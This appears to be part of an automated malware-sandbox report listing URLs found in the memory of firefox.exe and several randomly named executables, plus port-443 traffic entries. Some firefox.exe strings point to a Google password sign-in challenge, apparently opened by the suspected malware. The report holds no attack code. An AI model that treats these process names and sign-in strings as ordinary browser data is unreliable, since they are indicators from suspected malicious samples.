                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#l
                          Source: firefox.exe, 00000020.00000003.2876786610.00000253F61CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2894254253.00000253F61CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                          Source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmp, Fwkdsz.exe, 00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                          Source: Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jslinear-gradient(90deg
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                          Source: 24da741fb6.exe, 0000000B.00000003.2528173854.00000000059CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3316846931.00000253ED50A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
                          Source: firefox.exe, 00000020.00000002.3278500608.00000253EC003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3333312838.00000253EE803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
                          Source: firefox.exe, 00000020.00000003.2893839554.00000253ED881000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA243000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3343597221.00000253EFD5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                          Source: firefox.exe, 00000020.00000002.3313316473.00000253ED0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozi
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
                          Source: firefox.exe, 00000020.00000002.3338067333.00000253EEEA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2863902125.00000253EEEA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2790878227.00000253EEEA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2823140588.00000253EEEA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
                          Source: firefox.exe, 00000020.00000003.2884647850.00000253EF99E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3341541081.00000253EF99E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsUnable
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/DownloadIntegration.sys.mjs
                          Source: 24da741fb6.exe, 0000000B.00000003.2562607971.0000000005A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: firefox.exe, 00000020.00000002.3313316473.00000253ED0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.orgmaybeShowOnboardingDialogaccount-connection-connected_migrateXULStoreForD
                          Source: 24da741fb6.exe, 0000000B.00000003.2528173854.00000000059CD000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2814231322.000000001DA61000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016w2
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                          Source: firefox.exe, 00000020.00000002.3213102159.00000253EBB2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.combrowser.migration.versionbrowser.urlbar.openViewOnFocusmigrateXULAttri
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                          Source: firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2744719723.00000253F454B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                          Source: 24da741fb6.exe, 0000000B.00000003.2564360640.0000000005977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2817267782.00000253F46FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: 24da741fb6.exe, 0000000B.00000003.2564360640.0000000005977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: firefox.exe, 00000020.00000003.2757294999.00000253EE9D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                          Source: firefox.exe, 00000020.00000003.2668435370.00000253EC21F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668905912.00000253EC25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668690950.00000253EC23C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2669234122.00000253EC277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: 24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3316846931.00000253ED597000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3334462690.00000253EE9AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E889E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E94A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2936521674.000000E4A137C000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3316846931.00000253ED50A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 00000020.00000002.3313316473.00000253ED0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/How
                          Source: firefox.exe, 00000020.00000002.3313316473.00000253ED0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: 24da741fb6.exe, 0000000B.00000003.2562607971.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3313316473.00000253ED0CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3306756029.00000253ECA51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: firefox.exe, 00000020.00000002.3313316473.00000253ED0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/startQuery/
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
                          Source: firefox.exe, 00000020.00000003.2881292109.00000253F464F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/V
                          Source: 24da741fb6.exe, 0000000B.00000003.2562607971.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3313316473.00000253ED0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: firefox.exe, 00000020.00000002.2936521674.000000E4A137C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.orgo
                          Source: firefox.exe, 00000020.00000003.2885495011.00000253EF97C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E88AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/aInstanceID
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2970521081.00000253E7E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: firefox.exe, 00000020.00000003.2872318817.00000253ECB4D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2833931908.00000253ECB4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.widevine.com/
                          Source: firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                          Source: firefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
                          Source: firefox.exe, 00000020.00000002.3341850269.00000253EF9DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E873E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2818323900.00000253EE8BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                          Source: firefox.exe, 00000020.00000003.2897430854.00000253EED92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3333312838.00000253EE803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3336099647.00000253EED09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account
                          Source: firefox.exe, 00000020.00000002.3320063127.00000253ED7A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2918108699.00000253EF968000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3342340455.00000253EFA66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2818323900.00000253EE8BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2956394320.00000253DC711000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA29D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2916399155.00000253F4453000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2956394320.00000253DC75E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3316846931.00000253ED57A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2970521081.00000253E7EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3213102159.00000253EBB45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 00000020.00000002.3334026680.00000253EE8BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2818323900.00000253EE8BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd(
                          Source: firefox.exe, 0000001E.00000002.2652029363.000001B00F610000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2664686611.000002F0BDAF7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2954858205.00000253DC539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                          Source: firefox.exe, 00000020.00000002.2959187784.00000253DE301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63921 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63944 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63887 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63967 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63726 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63864 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63809
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63808
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63929
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63909 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63922
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63800
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63921
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63803
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63924
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63802
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63923
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63805
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63926
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63804
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63925
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63807
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63829 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63928
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63927
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63920
                          Source: unknownNetwork traffic detected: HTTP traffic on port 64021 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63991 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63830 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63812
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63933
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63811
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63932
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63935
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63934
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63816
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63876 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63936
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63818
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63939
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63817
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63938
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63810
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63933 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 63818 -> 443
